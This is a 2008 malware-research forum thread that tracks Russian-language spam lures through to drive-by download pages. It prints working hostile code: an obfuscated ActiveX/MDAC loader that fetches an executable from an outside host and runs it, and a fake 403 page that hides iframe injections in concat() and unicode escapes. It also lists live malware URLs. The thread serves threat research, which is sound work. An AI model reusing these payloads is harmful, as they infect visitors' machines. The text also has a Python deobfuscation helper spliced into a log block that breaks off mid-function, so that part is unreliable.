Topic: Infections via e-mail

May 14, 2008, 09:30:40 pm

MysteryFCM

First e-mail:

Code:
Exported by: prjOutlookExport v0.0.11


From: www@cards.ru
E-mail:www@cards.ru [ 194.58.78.125 - ns.jj.ru ]
Date: 16/04/2008 11:00:00
Subject: ??? ????????!
**************************************************************************
Links
**************************************************************************

Link: http://www.cards.ru/card.php?%RNDDIGIT1010
Domain: www.cards.ru
IP: 194.58.78.125 [ ns.jj.ru ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false

Link: http://www.nyan-doma.ru/card.php%URL_PARAMS
Domain: www.nyan-doma.ru
IP: 84.204.229.19 [ biz19.bizhosting.ru ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false

Link: http://nrc-driveru.104.com1.ru/card.php%URL_PARAMS
Domain: nrc-driveru.104.com1.ru
IP: 89.108.67.91 [ cp104.agava.net ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??? ?????? ??????????? ????????.%BR ??? ?? ????????? ??????? ?? ???? <http://www.cards.ru/card.php?%RNDDIGIT1010>
www.cards.ru/card.php?%RNDDIGIT1010 <http://www.nyan-doma.ru/card.php%URL_PARAMS>
? ??????? ?? ?????? '???????? ????????'%BR %BR ?????? ???????? ???????? CARDS.RU%BR ------------------------------------------------%BR %BR %BR You recieved an postcard.%BR To get it follow to web-site <http://www.cards.ru/card.php?%RNDDIGIT1010>
www.cards.ru/card.php?%RNDDIGIT1010 <http://nrc-driveru.104.com1.ru/card.php%URL_PARAMS>
switch to english and click on 'get my postcard'%BR %BR Postcard service (www@cards.ru)%BR


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??? ?????? ??????????? ????????.%BR ??? ?? ????????? ??????? ?? ???? &lt;<A HREF="http://www.cards.ru/card.php?%RNDDIGIT1010">http://www.cards.ru/card.php?%RNDDIGIT1010</A>&gt;<BR>
www.cards.ru/card.php?%RNDDIGIT1010 &lt;<A HREF="http://www.nyan-doma.ru/card.php%URL_PARAMS">http://www.nyan-doma.ru/card.php%URL_PARAMS</A>&gt; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>
? ??????? ?? ?????? '???????? ????????'%BR %BR ?????? ???????? ???????? CARDS.RU%BR ------------------------------------------------%BR %BR %BR You recieved an postcard.%BR To get it follow to web-site &lt;<A HREF="http://www.cards.ru/card.php?%RNDDIGIT1010">http://www.cards.ru/card.php?%RNDDIGIT1010</A>&gt;<BR>
www.cards.ru/card.php?%RNDDIGIT1010 &lt;<A HREF="http://nrc-driveru.104.com1.ru/card.php%URL_PARAMS">http://nrc-driveru.104.com1.ru/card.php%URL_PARAMS</A>&gt; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>
switch to english and click on 'get my postcard'%BR %BR Postcard service (www@cards.ru)%BR<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <www@cards.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-74.livemail.co.uk (Postfix) with SMTP id 5E2F256EAE3
for <services@it-mate.co.uk>; Wed, 16 Apr 2008 10:20:03 +0100 (BST)
Received: from unknown.interbgc.com (unknown [213.240.235.162])
by smtp-in-74.livemail.co.uk (Postfix) with SMTP id DDC6256EB35
for <services@it-mate.co.uk>; Wed, 16 Apr 2008 10:20:02 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: www@cards.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id ILM713eutxtyyo8365
        for <services@it-mate.co.uk>; Wed, 16 Apr 2008 12:20:1 +0200 (MSD)
        (envelope-from www@cards.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id EAA33zwodco37;
        Wed, 16 Apr 2008 12:20:1 +0200 (MSD)
        (envelope-from www)
Date: Wed, 16 Apr 2008 12:20:1 +0200 (MSD)
Message-Id: <20070502603.XJIF554cwqumvz96@cards.ru>
Reply-To: services@it-mate.co.uk
Errors-To: services@it-mate.co.uk
From: "" <www@cards.ru>
To: services@it-mate.co.uk
Subject: вам открытка!
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: services@it-mate.co.uk

None of the links in the first e-mail seem to work .....

Second e-mail:

Code:
Exported by: prjOutlookExport v0.0.11


From: dmitry@mail.ru
E-mail:dmitry@mail.ru [ 194.67.57.126 - mail.ru ]
Date: 14/05/2008 09:36:15
Subject: ??????????? ????
**************************************************************************
Links
**************************************************************************

Link: http://www.format.by/foto.php
Domain: www.format.by
IP: 212.98.181.80 [ myweb03.bn.by ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false

Link: http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services@it-mate.co.uk
Domain: www.format.by
IP: 212.98.181.80 [ myweb03.bn.by ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??????. ???? ????? .

??? ????? ????????? ???? ?????????? ???? http://www.format.by/foto.php <http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services@it-mate.co.uk> 



**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??????. ???? ????? .<BR>
<BR>
??? ????? ????????? ???? ?????????? ???? <A HREF="http://www.format.by/foto.php">http://www.format.by/foto.php</A> &lt;<A HREF="http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services@it-mate.co.uk">http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services@it-mate.co.uk</A>&gt;&nbsp;<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <dmitry@mail.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-112.livemail.co.uk (Postfix) with SMTP id 5797984DF3A
for <services@it-mate.co.uk>; Wed, 14 May 2008 02:36:22 +0100 (BST)
Received: from 123.212.44.228 (unknown [123.212.44.228])
by smtp-in-112.livemail.co.uk (Postfix) with SMTP id E077B84DF3A
for <services@it-mate.co.uk>; Wed, 14 May 2008 02:36:20 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: dmitry@mail.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id MFXL93qzbzam58
        for <services@it-mate.co.uk>; Wed, 14 May 2008 10:36:15 +0200 (MSD)
        (envelope-from dmitry@mail.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id LGT21uzujhkx64763;
        Wed, 14 May 2008 10:36:15 +0200 (MSD)
        (envelope-from www)
Date: Wed, 14 May 2008 10:36:15 +0200 (MSD)
Message-Id: <20070501728.L32umyjceyspe190@cards.ru>
Reply-To: services@it-mate.co.uk
Errors-To: services@it-mate.co.uk
From: "" <dmitry@mail.ru>
To: services@it-mate.co.uk
Subject: откровенное фото
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: services@it-mate.co.uk



Link content:

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.format.by/foto.php?s=1&fr=GarrettMckay&n=services
Server IP: 212.98.181.80 [ myweb03.bn.by ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 14 May 2008
Time: 22:22:54:22
*****************************************************************
<html>

<head>
  <title>ищу спонсора</title>
<META HTTP-EQUIV=Refresh Content="20;URL=foto.exe">
<meta HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=windows-1251">
</head>
<body><iframe name="FotoSpliceWorks" src="http://www.yvon-publicidad.com/images/index.php?s=sp&n=services" frameborder="0" border="0" height="1" width="1"></iframe>
<div></div>
<table width="100%" border="0" cellspacing="1" cellpadding="1">
  <tr>
    <td>
<center>
        <img src="http://pupsik.ru/teen/105/10.jpg" width="470" height="589">
      </center>
</td>
    <td>
<table id="container">

<tr>
<td id="content"><table height="100%" width="100%">
<tr><td height="100">

<div align="center" style="padding:5px;">
                    <p> <font  color="#CC3300">Спасибо всем, кто не поленился зайти.</font>
                    </p>
</div>
</td></tr>
<tr><td>
<p align="center"> <a href="foto.exe">foto.jpg</a>&nbsp;&nbsp;&nbsp;<br>
                    <br>
</p>
<p align="center">
закачка остальных фоток начнется через 30 секунд<br>
если загрузка не происходит, <a href="realfoto.exe">воспользуйтесь ссылкой</a>

</p>

<table width="100%">
<tr><td height="20"></td></tr>
<tr>
<td>&nbsp;</td>
                      <td width="400"> <p>Меня зовут <strong>Света</strong>, мне
                          17, я ищу спонсора, но понимаю что просто так ничего
                          в этом мире не бывает<br>
                          поэтом сразу выложила несколько своих <strong>более
                          откровенных</strong> фоток, если я тебе понравилась
                          то давай общаться в аське, а лучше в реале.. если ты
                          мне тоже понравишься, то я готова ой как на многое..
                          исполню <strong>любые</strong> желания, даже самые самые..</p>
                        <p><br>
                          все барыги кто придумает что у меня плохая фигура или маленькая
                          грудь - идут лесом, это далеко не так, посмотри все
                          фотки и вопрос отпадет, а может и чтото встанет :) хотя
                          у меня далеко не пятый размер.</p>
                        <p>&nbsp;</p>
                        <p><br>
                          <font  color="#000033">лучше один
                          раз увидеть чем десять раз услышать,<br>
                          лучше один раз потрогать чем десять раз увидеть,<br>
                          лучше одна ночь чем один сто раз потрогать,<br>
                          а ночь будет и не одна и не только ночь :)</font><br>
                        </p></td>
<td>&nbsp;</td>
</tr>
</table>

<td></tr>
<tr height="60"><td>
</td></tr>
</table>



</td>
</tr>
</table>


</td>
  </tr>
</table>
</body>
</html>

Malware downloaded:

http://www.format.by/foto.exe

... and the content of the iframe it loads:

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.yvon-publicidad.com/images/index.php?s=sp&n=services
Server IP: 193.34.16.223 [ mrs30.hosteur.com ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 14 May 2008
Time: 22:23:45:23
*****************************************************************
<script>

function CreateO(os, nz) {
var e0 = null;
      try {
eval('e0 = os.CreateObject(nz)') }catch(e){}
     if (! e0) {try { eval('e0 = os.CreateObject(nz, "")') }catch(e){}}
    if (! e0) {try { eval('e0 = os.CreateObject(nz, "", "")') }catch(e){}}
   if (! e0) {try { eval('e0 = os.GetObject("", nz)') }catch(e){}}
  if (! e0) {try { eval('e0 = os.GetObject(nz, "")') }catch(e){}}
 if (! e0) {try { eval('e0 = os.GetObject(nz)') }catch(e){}}
return(e0);
}

function Download(a)
{
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
lm.send();
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');

o.type = 1;
o.Mode = 3;
o.open();

o.Write(lm.responseBody);

var tut = ".//..//win"+".exe";
o.savetoFile(tut,2);
o.close();
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
s.Shellexecute(tut);
}

var x = 0;
var t = new Array(

'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);

while (t[x]) {
var a = null;
   if (t[x].substring(0,1) == '{') {
a = document.createElement('object');
a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
}  else {
   try
{ a = new ActiveXObject(t[x]); } catch(e){}
}
   if (a)
{
   try
{
var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
if (b) {
if (Download(a)) break;
}
}catch(e){}
}
x++;
}
setTimeout("window.location = 'jav.php'", 2500);
</script>
</body>
</html>

Malware downloaded:

http://www.yvon-publicidad.com/images/images.php?w=0&e=2

Third e-mail:

Code:
Exported by: prjOutlookExport v0.0.11


From: ac@mail.ru
E-mail:ac@mail.ru [ 194.67.57.126 - mail.ru ]
Date: 14/05/2008 10:13:29
Subject: ????? ????
**************************************************************************
Links
**************************************************************************

Link: http://www.aspen-architecture.com/foto.php
Domain: www.aspen-architecture.com
IP: 74.208.87.15 [ perfora.net ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false

Link: http://www.aspen-architecture.com/foto.php?s=1&fr=TrentMeeks&n=services@it-mate.co.uk
Domain: www.aspen-architecture.com
IP: 74.208.87.15 [ perfora.net ]
hpHosts Status: Skipped by user
MDL Status: Skipped by user
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??????. ???? ????? .

??? ????? ????????? ???? ?????????? ???? http://www.aspen-architecture.com/foto.php <http://www.aspen-architecture.com/foto.php?s=1&fr=TrentMeeks&n=services@it-mate.co.uk> 



**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??????. ???? ????? .<BR>
<BR>
??? ????? ????????? ???? ?????????? ???? <A HREF="http://www.aspen-architecture.com/foto.php">http://www.aspen-architecture.com/foto.php</A> &lt;<A HREF="http://www.aspen-architecture.com/foto.php?s=1&fr=TrentMeeks&n=services@it-mate.co.uk">http://www.aspen-architecture.com/foto.php?s=1&fr=TrentMeeks&n=services@it-mate.co.uk</A>&gt;&nbsp;<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <%MAIL_NAMES@mail.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-79.livemail.co.uk (Postfix) with SMTP id 730EEDEC87D
for <services@it-mate.co.uk>; Wed, 14 May 2008 06:13:40 +0100 (BST)
Received: from mail.ugok.ru (unknown [83.174.201.74])
by smtp-in-79.livemail.co.uk (Postfix) with SMTP id 211BDDEC8EF
for <services@it-mate.co.uk>; Wed, 14 May 2008 06:13:40 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: ac@mail.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id V296isqrmdpmjlaq15851
        for <services@it-mate.co.uk>; Wed, 14 May 2008 11:13:29 +0200 (MSD)
        (envelope-from ac@mail.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id ZW12yeniyw03;
        Wed, 14 May 2008 11:13:29 +0200 (MSD)
        (envelope-from www)
Date: Wed, 14 May 2008 11:13:29 +0200 (MSD)
Message-Id: <20070500374.GGW23uiojdl29@cards.ru>
Reply-To: services@it-mate.co.uk
Errors-To: services@it-mate.co.uk
From: "" <ac@mail.ru>
To: services@it-mate.co.uk
Subject: супер фото
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: services@it-mate.co.uk

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 14, 2008, 09:58:13 pm
Reply #1

JohnC


May 15, 2008, 02:16:36 pm
Reply #2

MysteryFCM

Code:
Exported by: prjOutlookExport v0.0.11


From: kovylyaeva_ui@mail.ru
E-mail:kovylyaeva_ui@mail.ru [ 194.67.57.126 - mail.ru ]
Date: 15/05/2008 15:39:40
Subject: , ??? ??????? ???????
**************************************************************************
Links
**************************************************************************

Link: http://djee.perecz.us/foto.php
Domain: djee.perecz.us
IP: 66.29.116.32 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://djee.perecz.us/foto.php?s=1&fr=ParrishTia&n=ceo@it-mate.co.uk
Domain: djee.perecz.us
IP: 66.29.116.32 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??????. ???? ????? .
??? ????? ????????? ???? ?????????? ???? http://djee.perecz.us/foto.php <http://djee.perecz.us/foto.php?s=1&fr=ParrishTia&n=ceo@it-mate.co.uk> 



**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??????. ???? ????? .<BR>
??? ????? ????????? ???? ?????????? ???? <A HREF="http://djee.perecz.us/foto.php">http://djee.perecz.us/foto.php</A> &lt;<A HREF="http://djee.perecz.us/foto.php?s=1&fr=ParrishTia&n=ceo@it-mate.co.uk">http://djee.perecz.us/foto.php?s=1&fr=ParrishTia&n=ceo@it-mate.co.uk</A>&gt;&nbsp;<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <%MAIL_NAMES@mail.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-164.livemail.co.uk (Postfix) with SMTP id 452E4EE810A
for <services@it-mate.co.uk>; Thu, 15 May 2008 13:39:44 +0100 (BST)
Received: from cl-5.access.bryansk.ru (unknown [62.33.2.5])
by smtp-in-164.livemail.co.uk (Postfix) with SMTP id A9630EE80F8
for <ceo@it-mate.co.uk>; Thu, 15 May 2008 13:39:43 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: kovylyaeva_ui@mail.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id TL021kbzwk833
        for <ceo@it-mate.co.uk>; Thu, 15 May 2008 16:39:40 +0200 (MSD)
        (envelope-from kovylyaeva_ui@mail.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id VJY796ryloujp334;
        Thu, 15 May 2008 16:39:40 +0200 (MSD)
        (envelope-from www)
Date: Thu, 15 May 2008 16:39:40 +0200 (MSD)
Message-Id: <20070502851.OACV974xpisog19@cards.ru>
Reply-To: ceo@it-mate.co.uk
Errors-To: ceo@it-mate.co.uk
From: "" <kovylyaeva_ui@mail.ru>
To: ceo@it-mate.co.uk
Subject: , мои сладкие булочки
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: ceo@it-mate.co.uk



Code:
Exported by: prjOutlookExport v0.0.11


From: andrey@rambler.ru
E-mail:andrey@rambler.ru [ 81.19.70.3 - rambler.ru ]
Date: 15/05/2008 14:30:19
Subject: , ??? ??????? ???????
**************************************************************************
Links
**************************************************************************

Link: http://www.e-lustrate.com/foto.php
Domain: www.e-lustrate.com
IP: 209.200.229.17 [ celaneo.lunarpages.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: http://www.e-lustrate.com/foto.php?s=1&fr=HolbrookSondra&n=services@it-mate.co.uk
Domain: www.e-lustrate.com
IP: 209.200.229.17 [ celaneo.lunarpages.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
??????. ???? ????? .
??? ????? ????????? ???? ?????????? ???? http://www.e-lustrate.com/foto.php <http://www.e-lustrate.com/foto.php?s=1&fr=HolbrookSondra&n=services@it-mate.co.uk> 



**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>??????. ???? ????? .<BR>
??? ????? ????????? ???? ?????????? ???? <A HREF="http://www.e-lustrate.com/foto.php">http://www.e-lustrate.com/foto.php</A> &lt;<A HREF="http://www.e-lustrate.com/foto.php?s=1&fr=HolbrookSondra&n=services@it-mate.co.uk">http://www.e-lustrate.com/foto.php?s=1&fr=HolbrookSondra&n=services@it-mate.co.uk</A>&gt;&nbsp;<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <%MAIL_NAMES@rambler.ru>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-123.livemail.co.uk (Postfix) with SMTP id 143955DE977
for <services@it-mate.co.uk>; Thu, 15 May 2008 13:30:19 +0100 (BST)
Received: from 81.30.171.54.vntp.net (unknown [81.30.171.54])
by smtp-in-123.livemail.co.uk (Postfix) with SMTP id 9BA315DE991
for <services@it-mate.co.uk>; Thu, 15 May 2008 13:30:18 +0100 (BST)
X-SpamTest-Categories: Formal Messages > Postcards; Internal-LGS > EL; Internal-LGS > RL
X-SpamTest-Envelope-From: andrey@rambler.ru
X-SpamTest-Formal: yes
X-SpamTest-Group-ID: 00000000
X-SpamTest-Info: Profiles 1020 [May 03 2007]
X-SpamTest-Info: helo_type=3
X-SpamTest-Method: none
X-SpamTest-Rate: 0
X-SpamTest-Status: Not detected
X-SpamTest-Status-Extended: formal
X-SpamTest-Version: SMTP-Filter Version 3.0.0 [0278], KAS30/Release
Received: from cards.ru (localhost [127.0.0.1])
        by cards.ru (8.13.4/8.13.4) with ESMTP id JHMH17mffyfsz21152
        for <services@it-mate.co.uk>; Thu, 15 May 2008 15:30:19 +0200 (MSD)
        (envelope-from andrey@rambler.ru)
Received: (from www@localhost)
        by cards.ru (8.13.7/8.13.7/Submit) id S21prjpxs67;
        Thu, 15 May 2008 15:30:19 +0200 (MSD)
        (envelope-from www)
Date: Thu, 15 May 2008 15:30:19 +0200 (MSD)
Message-Id: <20070501173.J342deuzrksvt244@cards.ru>
Reply-To: services@it-mate.co.uk
Errors-To: services@it-mate.co.uk
From: "" <andrey@rambler.ru>
To: services@it-mate.co.uk
Subject: , мои сладкие булочки
Precedence: special-delivery
Content-Type: text/html; charset=Windows-1251
Content-Transfer-Encoding: 8bit
X-Original-To: services@it-mate.co.uk


Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 15, 2008, 02:36:16 pm
Reply #3

MysteryFCM

e-lustrate.com PD displays a fake 403:

Code:
<HTML>
<HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD>
<BODY onload="status=' ';zz='2';sl='/';sf='ram';pi='9';po='.';qu=':';yh='4';tr='c.p';vo='3';bw='5';pt='tp';ab='src';dg='ht';ko='e';wd='if';ji='hp';hh='1';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);">
<H1>Forbidden</H1>
You do not have permission to access this document.
<P>
<HR>
<ADDRESS>
Web Server at &#101;&#45;&#108;&#117;&#115;&#116;&#114;&#97;&#116;&#101;&#46;&#99;&#111;&#109;
</ADDRESS>
</BODY>
</HTML>

<!--
   - Unfortunately, Microsoft has added a clever new
   - "feature" to Internet Explorer. If the text of
   - an error's message is "too small", specifically
   - less than 512 bytes, Internet Explorer returns
   - its own error message. You can turn that off,
   - but it's pretty tricky to find switch called
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - enough to make Internet Explorer happy. The
   - workaround is pretty simple: pad the error
   - message with a big comment like this to push it
   - over the five hundred and twelve bytes minimum.
   - Of course, that's exactly what you're reading
   - right now.
   -->
<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0032\u0036\u0030\u0033\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>

Redirects you to:

http://ruoo.info/forum/index.php

------> http://ruoo.info/forum/load.php > load.exe

http://194.145.235.34/c.php <--- Seems to be dead
http://atomakayan.biz/afterftpchek/2603/index.php

------> http://countermediagroup.com/ts/in.cgi?mymy

Code:
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://ruoo.info/forum/index.php
Server IP: 195.93.218.31 [ build.airhouse.su ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 15 May 2008
Time: 15:31:35:31
*****************************************************************
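The fake 403 above hides its iframe target twice (the concat()-built onload and the \uXXXX document.write), and the ActiveX loader in the earlier iframe splits its ProgIDs and CLSIDs into '+'-joined fragments. The following Python is an added analyst helper, not the poster's code or vURL's, that statically undoes those tricks without executing any JavaScript; the samples embedded in it are copied (the onload lightly trimmed) from the pages posted above.

```python
"""
Static deobfuscation of the string-hiding tricks in the samples posted above:
'+'-joined literals (the ActiveX loader in the iframe), var-then-concat()
building (the fake 403's onload) and \\uXXXX escapes (its document.write).
Nothing is executed; the JavaScript is only pattern-matched.
"""
import re

# One JavaScript string literal, single- or double-quoted, with no escapes
# inside (none of the samples use any); non-capturing so findall() returns it whole.
_STR = r"""(?:'[^'\\]*'|"[^"\\]*")"""
_CHAIN = re.compile(r"%s(?:\s*\+\s*%s)+" % (_STR, _STR))
_ASSIGN_LIT = re.compile(r"\b([A-Za-z_]\w*)\s*=\s*(%s)" % _STR)
_ASSIGN_CONCAT = re.compile(r"\b([A-Za-z_]\w*)\s*=\s*([A-Za-z_]\w*)\.concat\(([^)]*)\)")
_URL = re.compile(r"""https?://[^\s'"<>]+""")
_CLSID = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

def unescape_unicode(js):
    """Turn \\uXXXX and \\xXX escapes back into the characters they hide."""
    js = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), js)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js)

def join_split_literals(js):
    """Collapse 'm'+'sxm'+'l2' chains; return (rewritten text, joined values)."""
    joined = []

    def repl(match):
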